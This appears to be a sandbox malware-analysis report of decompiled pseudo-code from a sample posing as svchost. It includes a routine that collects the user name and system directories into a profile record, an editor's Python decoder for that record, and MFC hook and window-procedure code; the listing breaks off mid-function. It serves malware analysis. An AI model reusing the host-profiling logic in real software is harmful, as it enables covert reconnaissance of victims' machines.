    				_t95 = E004709B8(_t350 + 0x1c,  *((intOrPtr*)(E00468C00(_t350 + 0x68))));   // string -> int
    				_t351 = _t350 + 4;
    				 *((intOrPtr*)(_t343 + 0x78)) = _t95;                               // record +0x78 (DWORD)
    				E004832C2(_t351 + 0x68);
    				_t97 = E00468C60(_t351 + 0x68);
    				asm("repne scasb");
    				_t181 =  !(_t351 + 0x00000018 | 0xffffffff);
    				_t334 =  *_t97 - _t181;
    				_t182 = _t181 >> 2;
    				memcpy(_t334 + _t182 + _t182, _t334, memcpy(_t343 + 0x7c, _t334, _t182 << 2) & 0x00000003);   // record +0x7c
    				_t353 = _t351 + 0x18;
    				E004832C2(_t353 + 0x68);
    				GetUserNameA(_t343 + 0x90, _t353 + 0x14); // executed                // record +0x90: user name; buffer size in/out at +0x14
    				GetWindowsDirectoryA(_t343 + 0xf4, 0x104);                         // record +0xf4: Windows directory, MAX_PATH slot
    				GetSystemDirectoryA(_t343 + 0x1f8, 0x104);                         // record +0x1f8: system directory, MAX_PATH slot
    				 *((intOrPtr*)(_t343 + 0x2fc)) =  *(_t353 + 0x38);                  // record +0x2fc: DWORD taken from a local
    				_t109 = E00468CA0(_t353 + 0x68);
    				asm("repne scasb");
    				_t192 =  !(_t353 + 0x00000038 | 0xffffffff);
    				_t335 =  *_t109 - _t192;
    				_t193 = _t192 >> 2;
    				memcpy(_t335 + _t193 + _t193, _t335, memcpy(_t343 + 0x300, _t335, _t193 << 2) & 0x00000003);   // record +0x300
    				_t355 = _t353 + 0x18;
    				E004832C2(_t355 + 0x68);
    				 *((intOrPtr*)(_t343 + 0x31e)) =  *((intOrPtr*)(_t355 + 0x44));     // record +0x31e: DWORD taken from a local (unaligned)
    				_t116 = E00468C00(_t355 + 0x68);
    				asm("repne scasb");
    				_t202 =  !(_t355 + 0x00000038 | 0xffffffff);
    				_t336 =  *_t116 - _t202;
    				_t203 = _t202 >> 2;
    				memcpy(_t336 + _t203 + _t203, _t336, memcpy(_t343 + 0x322, _t336, _t203 << 2) & 0x00000003);   // record +0x322
    				_t357 = _t355 + 0x18;
    				E004832C2(_t357 + 0x68);
    				_t123 = E00468C60(_t357 + 0x68);
    				asm("repne scasb");
    				_t212 =  !(_t357 + 0x00000038 | 0xffffffff);
    				_t337 =  *_t123 - _t212;
    				_t213 = _t212 >> 2;
    				memcpy(_t337 + _t213 + _t213, _t337, memcpy(_t343 + 0x340, _t337, _t213 << 2) & 0x00000003);   // record +0x340
    				_t359 = _t357 + 0x18;
    				E004832C2(_t359 + 0x68);
    				_t130 = E00468C80(_t359 + 0x68);
    				asm("repne scasb");
    				_t222 =  !(_t359 + 0x00000038 | 0xffffffff);
    				_t338 =  *_t130 - _t222;
    				_t223 = _t222 >> 2;
    				memcpy(_t338 + _t223 + _t223, _t338, memcpy(_t343 + 0x35e, _t338, _t223 << 2) & 0x00000003);   // record +0x35e
    				_t361 = _t359 + 0x18;
    				E004832C2(_t361 + 0x68);
    				_t137 = E00468C40(_t361 + 0x68);
    				asm("repne scasb");
    				_t232 =  !(_t361 + 0x00000038 | 0xffffffff);
    				_t339 =  *_t137 - _t232;
    				_t233 = _t232 >> 2;
    				memcpy(_t339 + _t233 + _t233, _t339, memcpy(_t343 + 0x37c, _t339, _t233 << 2) & 0x00000003);   // record +0x37c
    				_t363 = _t361 + 0x18;
    				E004832C2(_t363 + 0x68);
    				_t144 = E00468CC0(_t363 + 0x68);
    				asm("repne scasb");
    				_t242 =  !(_t363 + 0x00000038 | 0xffffffff);
    				_t340 =  *_t144 - _t242;
    				_t243 = _t242 >> 2;
    				memcpy(_t340 + _t243 + _t243, _t340, memcpy(_t343 + 0x39a, _t340, _t243 << 2) & 0x00000003);   // record +0x39a
    				_t365 = _t363 + 0x18;
    				E004832C2(_t365 + 0x68);
    				 *((char*)(_t365 + 0x60)) = 1;
    				E004832C2(_t365 + 0xc);
    				 *((char*)(_t365 + 0x60)) = 0;
    				E0046D180(_t365 + 0x34);                                           // destroys the object constructed by E0046D0E0
    				 *((intOrPtr*)(_t365 + 0x60)) = 0xffffffff;
    				_t153 = E00468DC0(_t365 + 0x18);
    				 *[fs:0x0] =  *((intOrPtr*)(_t365 + 0x58));                        // unlink the SEH frame
    				return _t153;
    			}

    Statement addresses (side column of the listing, in statement order): 0x004688c0 0x004688c2 0x004688cd 0x004688ce 0x004688d5 0x004688d8 0x004688df 0x004688e8 0x004688f0 0x004688f5 0x004688fa 0x00468902 0x0046890c 0x00468914 0x0046891e 0x00468923 0x00468928 0x0046892c 0x00468931 0x0046893f 0x00468943 0x00468945 0x0046894f 0x00468954 0x00468957 0x0046895e 0x0046895e 0x00468964 0x00468972 0x00468974 0x0046897d 0x00468981 0x0046898b 0x0046898b 0x00468991 0x004689a7 0x004689ac 0x004689b3 0x004689b6 0x004689c4 0x004689d5 0x004689d7 0x004689dd 0x004689e1 0x004689eb 0x004689eb 0x004689f1 0x00468a02 0x00468a14 0x00468a26 0x00468a39 0x00468a3f 0x00468a4d 0x00468a4f 0x00468a5b 0x00468a5f 0x00468a69 0x00468a69 0x00468a6f 0x00468a7c 0x00468a87 0x00468a95 0x00468a97 0x00468aa3 0x00468aa7 0x00468ab1 0x00468ab1 0x00468ab7 0x00468ac5 0x00468ad3 0x00468ad5 0x00468ae1 0x00468ae5 0x00468aef 0x00468aef 0x00468af5 0x00468b03 0x00468b11 0x00468b13 0x00468b1f 0x00468b23 0x00468b2d 0x00468b2d 0x00468b33 0x00468b41 0x00468b4f 0x00468b51 0x00468b5d 0x00468b61 0x00468b6b 0x00468b6b 0x00468b71 0x00468b7f 0x00468b8d 0x00468b8f 0x00468b9b 0x00468b9f 0x00468ba9 0x00468ba9 0x00468baf 0x00468bb8 0x00468bbd 0x00468bc6 0x00468bcb 0x00468bd4 0x00468bdc 0x00468be8 0x00468bf2

    APIs
      • Part of subcall function 004832C2: InterlockedDecrement.KERNEL32(-000000F4), ref: 004832D6
    • GetUserNameA.ADVAPI32(?,?), ref: 00468A02
    • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,?,?,?,?,00490770,000000FF), ref: 00468A14
    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00468A26
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Directory$DecrementInterlockedNameSystemUserWindows
    • String ID:
    • API String ID: 3503911293-0
    • Opcode ID: 3f8cc1613fde575b9271bb2f22797e99c0689218dc98723edb99cf851acdf985
    • Instruction ID: 25c1f6e243ad20db0b1beea56d733ecbb4d3c9e73beb405b7f1c06acd8bfe085
    • Opcode Fuzzy Hash: 3f8cc1613fde575b9271bb2f22797e99c0689218dc98723edb99cf851acdf985
    • Instruction Fuzzy Hash: 9D917A762043048BC718EF35C8519AFBBD1BBD4764F404A2EF867872E1EE749A09C786
    Uniqueness

    Uniqueness Score: -1.00%
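    E004688C0 above writes its host profile into a caller-supplied buffer at fixed offsets: GetUserNameA at +0x90, GetWindowsDirectoryA at +0xf4, GetSystemDirectoryA at +0x1f8, inlined strcpy targets at +0x00, +0x64, +0x7c, +0x300, +0x322, +0x340, +0x35e, +0x37c and +0x39a, and three DWORDs at +0x78, +0x2fc and +0x31e. The Python decoder below is an added example written by the editor, not code from this report or recovered from the sample: it turns those destination offsets into a field table and parses one record, which is what an analyst needs before the same blob can be recognised in a memory dump or on the wire. Assumptions: each field's size is the gap to the next destination offset, the record is 0x3b8 bytes, strings are ANSI (the function uses only the *A APIs), the field names other than the three API-sourced ones are placeholders, and the record it parses is constructed for the test rather than captured from the sample.

```python
import struct

# Field table derived from the destination offsets in the decompiled E004688C0.
# Sizes are the gaps between consecutive destination offsets (assumed; the struct
# definition itself is not in the report). Names beginning with str_/int_/dword_
# are placeholders; the three API-sourced fields are named after their source API.
PROFILE_LAYOUT = [
    ("str_000",     0x000, 0x064, "str"),   # string obtained via E00468C20
    ("str_064",     0x064, 0x014, "str"),   # string from getter E00468C40
    ("int_078",     0x078, 0x004, "u32"),   # E004709B8 (string -> int) of getter E00468C00
    ("str_07c",     0x07c, 0x014, "str"),   # string from getter E00468C60
    ("user_name",   0x090, 0x064, "str"),   # GetUserNameA
    ("windows_dir", 0x0f4, 0x104, "str"),   # GetWindowsDirectoryA, MAX_PATH slot
    ("system_dir",  0x1f8, 0x104, "str"),   # GetSystemDirectoryA, MAX_PATH slot
    ("dword_2fc",   0x2fc, 0x004, "u32"),   # DWORD copied from a local; meaning not recoverable
    ("str_300",     0x300, 0x01e, "str"),   # string from getter E00468CA0
    ("dword_31e",   0x31e, 0x004, "u32"),   # DWORD copied from a local; meaning not recoverable
    ("str_322",     0x322, 0x01e, "str"),   # string from getter E00468C00
    ("str_340",     0x340, 0x01e, "str"),   # string from getter E00468C60
    ("str_35e",     0x35e, 0x01e, "str"),   # string from getter E00468C80
    ("str_37c",     0x37c, 0x01e, "str"),   # string from getter E00468C40
    ("str_39a",     0x39a, 0x01e, "str"),   # string from getter E00468CC0
]
PROFILE_SIZE = 0x3b8   # end of the last field; assumed record size


def layout_is_contiguous(layout=PROFILE_LAYOUT):
    """Sanity check on the inferred sizes: fields must tile the record without gaps."""
    expected = 0
    for _, off, size, _ in layout:
        if off != expected:
            return False
        expected = off + size
    return expected == PROFILE_SIZE


def parse_profile(blob):
    """Decode one record. Strings are ANSI and NUL-terminated inside their fixed-size
    slot; bytes after the terminator are ignored, an unterminated slot is read whole."""
    if len(blob) < PROFILE_SIZE:
        raise ValueError("record too short: %d < %d" % (len(blob), PROFILE_SIZE))
    out = {}
    for name, off, size, kind in PROFILE_LAYOUT:
        raw = blob[off:off + size]
        if kind == "u32":
            out[name] = struct.unpack_from("<I", raw)[0]   # unaligned fields are fine here
        else:
            out[name] = raw.split(b"\x00", 1)[0].decode("latin-1")
    return out


def build_profile(values):
    """Serialise a dict into the record layout (used only to construct test input).
    Strings are truncated to leave room for the terminator, mirroring the fixed slots."""
    buf = bytearray(PROFILE_SIZE)
    for name, off, size, kind in PROFILE_LAYOUT:
        v = values.get(name, 0 if kind == "u32" else "")
        if kind == "u32":
            struct.pack_into("<I", buf, off, v & 0xFFFFFFFF)
        else:
            enc = v.encode("latin-1")[:size - 1]
            buf[off:off + len(enc)] = enc
    return bytes(buf)


# Constructed sample record; the values are illustrative, not taken from the analysis.
SAMPLE_VALUES = {
    "str_000": "bot-id-0001",
    "int_078": 1252,
    "user_name": "analyst",
    "windows_dir": "C:\\Windows",
    "system_dir": "C:\\Windows\\system32",
    "dword_2fc": 0x0A28,
    "str_300": "x" * 40,        # longer than its 0x1e slot, so it is truncated to 29 chars
}
SAMPLE_PROFILE = build_profile(SAMPLE_VALUES)

if __name__ == "__main__":
    for key, val in parse_profile(SAMPLE_PROFILE).items():
        print("%-12s %r" % (key, val))
```

    To use it on real data, hand parse_profile() the 0x3b8 bytes starting at the address the caller of E004688C0 passes in its +0x68 argument (taken from a process dump or from whatever the sample later copies out of that buffer); if the placeholder fields turn out to carry the locale values that E0046D210 collects, rename them in PROFILE_LAYOUT rather than in the parser.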

    C-Code - Quality: 58%
    			E0048551D(intOrPtr* __ecx, int _a4, int _a8, long _a12) {
    				/* Annotation (editor): matches MFC's CWnd::DefWindowProc(nMsg, wParam,
    				   lParam). __ecx = CWnd* (m_hWnd at +0x1c, m_pfnSuper at +0x28, vtable
    				   slot +0x80 = GetSuperWndProcAddr). 0x4923fc is the import slot of
    				   user32!DefWindowProcA, which the report lists as
    				   NtdllDefWindowProc_A.NTDLL because user32 forwards it to ntdll. */
    				_Unknown_base(*)()* _t11;
    				long _t12;
    				intOrPtr* _t17;
    
    				_t17 = __ecx;
    				_t11 =  *(__ecx + 0x28);                                          // m_pfnSuper
    				if(_t11 != 0) {
    					L3:
    					_t12 = CallWindowProcA(_t11,  *(_t17 + 0x1c), _a4, _a8, _a12); // executed
    					return _t12;
    				}
    				_t11 =  *( *((intOrPtr*)( *__ecx + 0x80))());                     // *GetSuperWndProcAddr()
    				if(_t11 != 0) {
    					goto L3;
    				}
    				return  *0x4923fc( *((intOrPtr*)(__ecx + 0x1c)), _a4, _a8, _a12);   // ::DefWindowProcA(m_hWnd, nMsg, wParam, lParam)
    			}

    Statement addresses (side column of the listing, in statement order; 0x00000000 marks a statement without its own address): 0x00485521 0x00485523 0x00485528 0x0048554c 0x00485559 0x00000000 0x00485559 0x00485532 0x00485536 0x00000000 0x00000000 0x00000000

    APIs
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00485544
    • CallWindowProcA.USER32(?,?,?,?,?), ref: 00485559
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$CallNtdllProcProc_
    • String ID:
    • API String ID: 1646280189-0
    • Opcode ID: c439435f24d607b4894c229a249444f9930e5b5a4b9803552e7523e3a835613f
    • Instruction ID: 758b206fa8de9d7800f74f62e6438602a99a825a7f18a5a9216c80f97a3df5c6
    • Opcode Fuzzy Hash: c439435f24d607b4894c229a249444f9930e5b5a4b9803552e7523e3a835613f
    • Instruction Fuzzy Hash: E8F09236100619FFDF21AF95DC04D9A7FBAFF18360B04892AFA4586124D776D920AB54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 45%
    			E00484D30(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				/* Annotation (editor): matches MFC's AfxWndProc(hWnd, nMsg, wParam, lParam).
    				   0x360 is WM_QUERYAFXWNDPROC, the private message MFC uses to recognise
    				   its own window procedure. E00484CAB = CWnd::FromHandlePermanent,
    				   E00484AB9 = AfxCallWndProc, 0x4923fc = import slot of DefWindowProcA. */
    				void* __ebp;
    				void* _t10;
    				void* _t12;
    				void* _t13;
    				intOrPtr _t15;
    
    				if(_a8 != 0x360) {                                                 // nMsg != WM_QUERYAFXWNDPROC
    					_t15 = _a4;                                                    // hWnd
    					_push(_t15);
    					_t10 = E00484CAB();                                            // CWnd* from the permanent handle map
    					if(_t10 == 0 ||  *((intOrPtr*)(_t10 + 0x1c)) != _t15) {        // no CWnd, or its m_hWnd does not match
    						return  *0x4923fc(_t15, _a8, _a12, _a16);                  // ::DefWindowProcA
    					} else {
    						_t12 = E00484AB9(__edx, _t10, _t15, _a8, _a12, _a16); // executed   // route through the message map
    						return _t12;
    					}
    				}
    				_t13 = 1;                                                          // answers "this window uses AfxWndProc"
    				return _t13;
    			}

    Statement addresses (side column of the listing, in statement order; 0x00000000 marks a statement without its own address): 0x00484d3b 0x00484d42 0x00484d45 0x00484d46 0x00484d4d 0x00000000 0x00484d54 0x00484d5f 0x00000000 0x00484d5f 0x00484d4d 0x00484d3f 0x00000000

    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 882d000e640201579e1b864fdc64907d2c3e1a74183eea6d38de7fc27c17beb0
    • Instruction ID: 1a40983a7c4e1586d01f62236d58ffffc1a6c29bb891c977b62ee0d6d9465875
    • Opcode Fuzzy Hash: 882d000e640201579e1b864fdc64907d2c3e1a74183eea6d38de7fc27c17beb0
    • Instruction Fuzzy Hash: ACF0373244161BFBCF22EE919D00DDF3B99AF453A0F00C817FA0555051D379D561EBA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0047C0DA() {
    				/* Annotation (editor): installs E0047C094 as the process-wide top-level
    				   exception filter and keeps the previously installed filter at 0x4e1a00,
    				   presumably so it can be restored or chained to later. */
    				_Unknown_base(*)()* _t1;
    
    				_t1 = SetUnhandledExceptionFilter(E0047C094); // executed
    				 *0x4e1a00 = _t1;                                                  // previous filter
    				return _t1;
    			}

    Statement addresses (side column of the listing, in statement order): 0x0047c0df 0x0047c0e5 0x0047c0ea

    APIs
    • SetUnhandledExceptionFilter.KERNELBASE(Function_0007C094), ref: 0047C0DF
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled
    • String ID:
    • API String ID: 3192549508-0
    • Opcode ID: c81e3b9b014ebf2b99ad4ee89c6ce7e0b5ea760d679c8215c36d96d8e2ab3878
    • Instruction ID: bd4b4791cc2b9131ee6f87750736e02b870b6b2063c7b3204d7e0327ece7b522
    • Opcode Fuzzy Hash: c81e3b9b014ebf2b99ad4ee89c6ce7e0b5ea760d679c8215c36d96d8e2ab3878
    • Instruction Fuzzy Hash: 6CA022B80823C0CFCB200FF0AE8820C3A20B380B83300833BAA0280230CBB80000AA8C
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: cea670d8bc90e99976d7c29b735870fe72fb138dc23785df3ed1ca924fb49595
    • Instruction ID: c25ef2699e5ee57b59a53d1ee2354105f692bbe0cb55dd7a295ba957f186d51c
    • Opcode Fuzzy Hash: cea670d8bc90e99976d7c29b735870fe72fb138dc23785df3ed1ca924fb49595
    • Instruction Fuzzy Hash: 82113D71D04208EBDF10AFA1D9027EEBF74EB04314F10417AF510762C1D6795A50DB9B
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 82%
    			E00484F5C(void* __edx, void* _a4, int _a8, long _a12) {
    				intOrPtr _v8;
    				signed int _v12;
    				char _v20;
    				void* __ebp;
    				intOrPtr _t50;
    				signed int _t52;
    				long _t53;
    				long _t62;
    				long _t70;
    				char _t71;
    				long _t73;
    				unsigned int _t76;
    				int _t83;
    				signed char _t92;
    				void* _t93;
    				void* _t95;
    				long _t96;
    				intOrPtr _t99;
    				intOrPtr* _t101;
    				intOrPtr _t102;
    				CHAR* _t104;
    				long _t105;
    
    				_t93 = __edx;
    				_t50 = E0048CC47(0x4e140c, E0048BFC8);
    				_v8 = _t50;
    				if(_a4 != 3) {
    					return CallNextHookEx( *(_t50 + 0x2c), _a4, _a8, _a12);
    				}
    				_t101 =  *((intOrPtr*)(_t50 + 0x14));
    				_t95 =  *_a12;
    				_t52 =  *(E0048C6BF() + 0x14) & 0x000000ff;
    				_t83 = _a8;
    				_v12 = _t52;
    				if(_t101 != 0 || ( *(_t95 + 0x23) & 0x00000040) == 0 && _t52 == 0) {
    					if( *0x4e1544 == 0) {
    						L10:
    						if(_t101 == 0) {
    							_t53 = GetWindowLongA(_t83, 0xfffffffc);
    							_a4 = _t53;
    							if(_t53 != 0) {
    								_t104 = "AfxOldWndProc423";
    								if(GetPropA(_t83, _t104) == 0) {
    									SetPropA(_t83, _t104, _a4); // executed
    									if(GetPropA(_t83, _t104) == _a4) {
    										GlobalAddAtomA(_t104);
    										_t62 = E00484EE0;
    										if( *((intOrPtr*)(_v8 + 0x28)) == 0) {
    											_t62 = E00484D81;
    										}
    										SetWindowLongA(_t83, 0xfffffffc, _t62);
    									}
    								}
    							}
    							goto L27;
    						}
    						E00484CC9(_t101, _t83);
    						 *((intOrPtr*)( *_t101 + 0x50))();
    						_a8 =  *((intOrPtr*)( *_t101 + 0x80))();
    						if( *0x4e1534 != 0 || _v12 != 0) {
    							L18:
    							_t105 = E00484D7B();
    							_t70 = SetWindowLongA(_t83, 0xfffffffc, _t105);
    							if(_t70 == _t105) {
    								goto L20;
    							}
    							goto L19;
    						} else {
    							_t99 =  *0x4e14d0; // 0xe13460
    							if(_t99 == 0 ||  *((intOrPtr*)(_t99 + 0x20)) == 0) {
    								goto L18;
    							} else {
    								_push(0);
    								_push(0);
    								_push(0x36f);
    								_push(_t83);
    								_push(_t101);
    								_t71 = E00484AB9(_t93);
    								_v20 = _t71;
    								if(_t71 == 0) {
    									goto L18;
    								}
    								_a4 = E00484D7B();
    								_t73 = GetWindowLongA(_t83, 0xfffffffc);
    								asm("sbb esi, esi");
    								 *((intOrPtr*)(_t99 + 0x20))(_t83, _v20);
    								if( ~(_t73 - _a4) + 1 != 0) {
    									L20:
    									_t102 = _v8;
    									 *(_t102 + 0x14) =  *(_t102 + 0x14) & 0x00000000;
    									goto L28;
    								}
    								_t70 = SetWindowLongA(_t83, 0xfffffffc, _a4);
    								L19:
    								 *_a8 = _t70;
    								goto L20;
    							}
    						}
    					}
    					if((GetClassLongA(_t83, 0xffffffe6) & 0x00010000) != 0) {
    						goto L27;
    					}
    					_t76 =  *(_t95 + 0x28);
    					_t92 = _t76 >> 0x10;
    					if(_t92 == 0) {
    						_v20 = _v20 & _t92;
    						GlobalGetAtomNameA( *(_t95 + 0x28),  &_v20, 5);
    						_t76 =  &_v20;
    					}
    					_push("ime");
    					_push(_t76);
    					if( *0x4921fc() == 0) {
    						goto L27;
    					} else {
    						goto L10;
    					}
    				} else {
    					L27:
    					_t102 = _v8;
    					L28:
    					_t96 = CallNextHookEx( *(_t102 + 0x2c), 3, _t83, _a12);
    					if(_v12 != 0) {
    						UnhookWindowsHookEx( *(_t102 + 0x2c));
    						 *(_t102 + 0x2c) =  *(_t102 + 0x2c) & 0x00000000;
    					}
    					return _t96;
    				}
    			}

    APIs
      • Part of subcall function 0048CC47: TlsGetValue.KERNEL32(004E141C,00000000,?,00483883,0048BFC8,?,?,00483860,?,0040AB42,000007DD,?,00000000), ref: 0048CC86
    • CallNextHookEx.USER32(?,00000003,?,?), ref: 00484F86
    • GetClassLongA.USER32(?,000000E6), ref: 00484FCD
    • GlobalGetAtomNameA.KERNEL32(?,?,00000005), ref: 00484FF9
    • lstrcmpi.KERNEL32(?,ime), ref: 00485008
    • GetWindowLongA.USER32(?,000000FC), ref: 0048507B
    • SetWindowLongA.USER32(?,000000FC,00000000), ref: 0048509C
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
    • String ID: AfxOldWndProc423$`4$ime
    • API String ID: 3731301195-158588402
    • Opcode ID: d389d0ed5f8905fea4df925324e2ad6fe00f6e95fc342fb6c0beae535606e1de
    • Instruction ID: 21250f6b29592b4b1635f3a85b5d3ff60d85be4638d5471d884da1f7f9e51988
    • Opcode Fuzzy Hash: d389d0ed5f8905fea4df925324e2ad6fe00f6e95fc342fb6c0beae535606e1de
    • Instruction Fuzzy Hash: 6A51B131900615BFCF21AF64DD48B6F3BA9FF04365F104A2AF915AB2A1C7789D40CB99
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    [Control-flow graph image not recoverable: basic blocks 43c3f0 through 43c930, with executed and not-executed blocks colour-coded in the original; API calls along the graph: GetProcessHeap, OleInitialize, GetModuleFileNameA, SetCurrentDirectoryA, LoadCursorA, GetStockObject, GetCurrentThreadId]
    C-Code - Quality: 83%
    			E0043C3F0(intOrPtr __ecx) {
    				void* _v8;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				signed int _v32;
    				intOrPtr _v36;
    				intOrPtr* _v40;
    				signed int _v44;
    				signed int _v52;
    				char _v60;
    				intOrPtr _v64;
    				char _v68;
    				char _v76;
    				char _v116;
    				char _v184;
    				char _v444;
    				void* __esi;
    				void* __ebp;
    				intOrPtr _t119;
    				struct HICON__* _t131;
    				void* _t133;
    				signed int _t136;
    				intOrPtr _t140;
    				signed int _t149;
    				intOrPtr* _t152;
    				intOrPtr _t158;
    				void* _t160;
    				void* _t163;
    				void* _t166;
    				struct HINSTANCE__** _t168;
    				struct HINSTANCE__* _t173;
    				signed int _t176;
    				intOrPtr _t177;
    				intOrPtr _t178;
    				intOrPtr* _t179;
